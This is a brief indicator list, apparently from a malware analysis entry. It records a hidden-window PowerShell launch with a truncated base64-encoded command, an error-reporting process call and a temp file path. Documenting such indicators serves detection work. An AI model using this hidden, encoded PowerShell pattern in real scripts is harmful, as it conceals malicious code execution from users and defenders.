Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAHkAYwBiAHUAbQBpAGMAcQBoAD0AJwBEAHEAZwB0AHIAbQBxAHMAJwA7ACQATQBkAHcAZgBmAHAAZQBkAHoAIAA9ACAAJwA3ADMAOQAnADsAJABQAHEAbwB3AHEAawBwAHMAeABnAGkAeQB1AD0AJwBYAG8...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\954476.cvr